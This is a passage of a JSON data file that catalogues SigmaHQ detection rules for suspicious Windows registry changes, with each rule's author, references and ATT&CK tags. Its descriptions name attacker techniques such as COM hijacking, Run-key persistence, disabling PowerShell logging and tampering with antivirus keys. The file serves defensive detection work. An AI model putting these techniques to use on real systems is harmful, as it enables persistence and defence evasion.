"creation_date": "2021/06/09", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_outlook_registry_webview.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", - "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "value": "Persistent Outlook Landing Pages" - }, - { - "description": "Change outlook email security settings", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "registry_set_outlook_security.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", - "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ] - }, - "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", - "value": "Change Outlook Security Setting in Registry" - }, - { - "description": "Detects potential persistence using Appx DebugPath", - "meta": { - "author": "frack113", - "creation_date": "2022/07/27", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_persistence_appx_debugger.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", - "https://github.com/rootm0s/WinPwnage", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", - "value": "Windows Registry Persistence DebugPath" - }, - { - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_persistence_autodial_dll.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", - "https://persistence-info.github.io/Data/autodialdll.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", - "value": "Persistence Via AutodialDLL" - }, - { - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/28", - "falsepositive": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" - ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "value": "COM Hijacking For Persistence With Suspicious Locations" - }, - { - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/09", - "falsepositive": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" - ], - "filename": "registry_set_persistence_mycomputer.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "value": "Persistence Via MyComputer Key and SubKeys" - }, - { - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "meta": { - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", - "creation_date": "2020/04/14", - "falsepositive": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" - ], - "filename": "registry_set_persistence_search_order.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", - "https://attack.mitre.org/techniques/T1546/015/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "value": "Windows Registry Persistence COM Search Order Hijacking" - }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/22", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_persistence_typed_paths.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", - "value": "Persistence Via TypedPaths" - }, - { - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_policies_associations_tamper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", - "value": "Modify Attachment Manager Settings - Associations" - }, - { - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_policies_attachments_tamper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", - "value": "Modify Attachment Manager Settings - Attachments" - }, - { - "description": "Detects that a powershell code is written to the registry as a service.", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_powershell_as_service.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "value": "PowerShell as a Service in Registry" - }, - { - "description": "Adds a RUN key that contains a powershell keyword", - "meta": { - "author": "frack113, Florian Roth", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate admin or third party scripts" - ], - "filename": "registry_set_powershell_in_run_keys.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "value": "Powershell in Windows Run Keys" - }, - { - "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", - "meta": { - "author": "frack113", - "creation_date": "2022/04/02", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_powershell_logging_disabled.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "value": "PowerShell Logging Disabled" - }, - { - "description": "Detects when a new custom protocole handler is registered", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/30", - "falsepositive": [ - "Legitimate applications registering a new custom protocol handler" - ], - "filename": "registry_set_register_custom_protocol_handler.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "value": "Newly Registered Protocol Handler" - }, - { - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "8023f872-3f1d-4301-a384-801889917ab4", - "value": "Usage of Renamed Sysinternals Tools - RegistrySet" - }, - { - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use of the dll." - ], - "filename": "registry_set_scrobj_dll_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ] - }, - "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "value": "Scrobj.dll COM Hijacking" - }, - { - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "meta": { - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "creation_date": "2022/05/04", - "falsepositive": [ - "Legitimate use of screen saver" - ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/VakninHai/status/1517027824984547329", - "https://twitter.com/pabraeken/status/998627081360695297", - "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "value": "ScreenSaver Registry Key Set" - }, - { - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/04", - "falsepositive": [ - "Administrative scripts", - "Installation of a service" - ], - "filename": "registry_set_servicedll_hijack.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "value": "ServiceDll Hijack" - }, - { - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "meta": { - "author": "frack113", - "creation_date": "2022/03/18", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "registry_set_set_nopolicies_user.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "value": "Registry Explorer Policy Modification" - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_shim_databases_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.011" - ] - }, - "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "value": "Registry Key Creation or Modification for Shim DataBase" - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/26", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_silentprocessexit.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ] - }, - "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", - "value": "SilentProcessExit Monitor Registration" - }, - { - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate SIP being registered by the OS or different software." - ], - "filename": "registry_set_sip_persistence.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/codesigning.html", - "https://github.com/gtworek/PSBits/tree/master/SIP", - "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1553.003" - ] - }, - "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "value": "Persistence Via New SIP Provider" - }, - { - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/02", - "falsepositive": [ - "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "filename": "registry_set_sophos_av_tamaper.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "value": "Tamper With Sophos AV Registry Keys" - }, - { - "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" to \"0\" in order to hide user account.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_special_accounts.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ] - }, - "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "value": "Hide User Account Via Special Accounts Reg Key" - }, - { - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_suppress_defender_notifications.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", - "value": "Activate Suppression of Windows Security Center Notifications" - }, - { - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/10", - "falsepositive": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" - ], - "filename": "registry_set_susp_app_paths_persistence.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ] - }, - "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "value": "Suspicious Values In App Paths Default Property" - }, - { - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/12", - "falsepositive": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - ], - "filename": "registry_set_susp_keyboard_layout_load.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", - "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "value": "Suspicious Keyboard Layout Load" - }, - { - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/01", - "falsepositive": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" - ], - "filename": "registry_set_susp_printer_driver.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1410545674773467140", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" - ] - }, - "uuid": "e0813366-0407-449a-9869-a2db1119dc41", - "value": "Suspicious Printer Driver Empty Manufacturer" - }, - { - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "meta": { - "author": "Florian Roth, oscd.community", - "creation_date": "2018/07/18", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", - "value": "Registry Persistence via Explorer Run Key" - }, - { - "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", - "meta": { - "author": "Florian Roth, Markus Neis, Sander Wiebing", - "creation_date": "2018/08/25", - "falsepositive": [ - "Software using weird folders for updates" - ], - "filename": "registry_set_susp_run_key_img_folder.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", - "value": "New RUN Key Pointing to Suspicious Folder" - }, - { - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "meta": { - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "creation_date": "2019/04/08", - "falsepositive": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." - ], - "filename": "registry_set_susp_service_installed.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" - ], - "tags": [ - "attack.t1562.001", - "attack.defense_evasion" - ] - }, - "uuid": "f2485272-a156-4773-82d7-1d178bc4905b", - "value": "Suspicious Service Installed" - }, - { - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "meta": { - "author": "frack113", - "creation_date": "2022/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_susp_user_shell_folders.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" - ] - }, - "uuid": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "value": "Modify User Shell Folders Startup Value" - }, - { - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "meta": { - "author": "Syed Hasan (@syedhasan009)", - "creation_date": "2021/06/18", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_taskcache_entry.yml", - "level": "high", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://labs.f-secure.com/blog/scheduled-task-tampering/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" - ] - }, - "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "value": "Scheduled TaskCache Change by Uncommon Program" - }, - { - "description": "Detects persistence method using windows telemetry", - "meta": { - "author": "Lednyov Alexey, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_set_telemetry_persistence.yml", - "level": "critical", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "73a883d0-0348-4be4-a8d8-51031c2564f8", - "value": "Registry Persistence Mechanism via Windows Telemetry" - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "meta": { - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "creation_date": "2022/09/29", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "filename": "registry_set_terminal_server_suspicious.yml", - "level": "medium", - "logsource.category": "registry_set", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "value": "RDP Sensitive Settings Changed to Zero" - }, - { - "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "meta": { - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", - "creation_date": "2022/08/06", - "falsepositive": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" - ], - "filename": 